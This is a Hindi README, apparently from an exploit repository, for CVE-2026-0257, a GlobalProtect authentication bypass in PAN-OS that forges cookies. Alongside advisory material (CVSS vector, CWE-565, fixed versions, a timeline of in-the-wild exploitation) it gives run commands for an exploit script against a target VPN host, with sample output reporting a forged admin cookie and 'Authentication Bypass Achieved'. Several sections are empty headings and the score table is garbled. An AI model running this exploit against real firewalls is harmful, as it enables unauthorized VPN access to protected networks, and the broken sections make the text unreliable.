
CVE-2026-0257
PAN-OS: GlobalProtect प्रमाणीकरण बायपास कमजोरियाँ
GlobalProtect पोर्टल और गेटवे में प्रमाणीकरण बायपास
CVE-2026-0257 एक प्रमाणीकरण बायपास कमजोरी है जो Palo Alto Networks PAN-OS सॉफ़्टवेयर के GlobalProtect पोर्टल और गेटवे घटकों को प्रभावित करती है।
एक अनधिकृत दूरस्थ हमलावर सुरक्षा प्रतिबंधों को बायपास कर सकता है और प्रभावित फ़ायरवॉल के लिए एक अनधिकृत VPN कनेक्शन स्थापित कर सकता है।
नोट: Panorama और Cloud NGFW प्रभावित नहीं हैं।
वेक्टर (CVSS 4.0 उदाहरण):
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:H/SI:H/SA:N
GlobalProtect पोर्टल और गेटवे में प्रमाणीकरण बायपास कमजोरियाँ हमलावर को सुरक्षा प्रतिबंधों को बायपास करने और एक अनधिकृत VPN कनेक्शन स्थापित करने की अनुमति देती हैं।
समस्या CWE-565: सत्यापन और अखंडता जाँच के बिना कुकीज़ पर निर्भरता से उत्पन्न होती है।
प्रभावित नहीं:
यह कमजोरी शोषण योग्य होने के लिए निम्नलिखित कॉन्फ़िगरेशन की आवश्यकता है:
संरक्षित नेटवर्क की गोपनीयता और अखंडता पर उच्च प्रभाव।
python3 CVE-2026-0257.py --target vpn.company.com
python3 CVE-2026-0257.py --target 192.168.1.100 --user administrator --verbose
╔══════════════════════════════════════════════════════════════╗
║ CVE-2026-0257 - GlobalProtect Auth Bypass ║
║ Public Key Cookie Forging Exploit ║
║ Author: 0xBlackash ║
╚══════════════════════════════════════════════════════════════╝
[*] Connecting to vpn.company.com:443 to extract certificate chain...
[+] Found 2048-bit RSA key
[*] Forging authentication cookie for user: admin
[1/1] Trying public key...
Cookie (first 60 chars): eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9...
[+] SUCCESS! Authentication Bypass Achieved!
Username : admin
Cookie : eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9...
निर्धारित संस्करण (तुरंत लागू करें):
| PAN-OS संस्करण | निर्धारित रिलीज़ |
|---|---|
| 12.1 | ≥ 12.1.4-h6, ≥ 12.1.7 |
| 11.2 | ≥ 11.2.4-h17, ≥ 11.2.7-h14, आदि. |
| 11.1 | ≥ 11.1.4-h33, ≥ 11.1.7-h6, आदि. |
| 10.2 | ≥ 10.2.7-h34, ≥ 10.2.10-h36, आदि. |
Prisma Access में भी संबंधित निर्धारित संस्करण हैं।
तत्काल वर्कअराउंड (यदि पैचिंग संभव न हो):
| दिनांक | घटना |
|---|---|
| 2026-05-13 | CVE प्रकाशित + प्रारंभिक सलाह |
| 2026-05-17 | वास्तविक वातावरण में शोषण देखा गया |
अनुशंसा: तुरंत पैच करें — सक्रिय शोषण के कारण आधार CVSS स्कोर के बावजूद इसे क्रांतिक मानें।
README शैली में उत्पन्न — 30 मई, 2026
| मीट्रिक | स्कोर | रेटिंग |
|---|
| CVSS v4.0 | 7.8 / 4.7 | उच्च / मध्यम |
| CVSS v3.x | 9.8 तक | क्रांतिक |
| तात्कालिकता | उच्चतम | - |
| Palo Alto अद्यतन + CISA KEV जोड़ |
| 2026-05-30 | यह रिपोर्ट |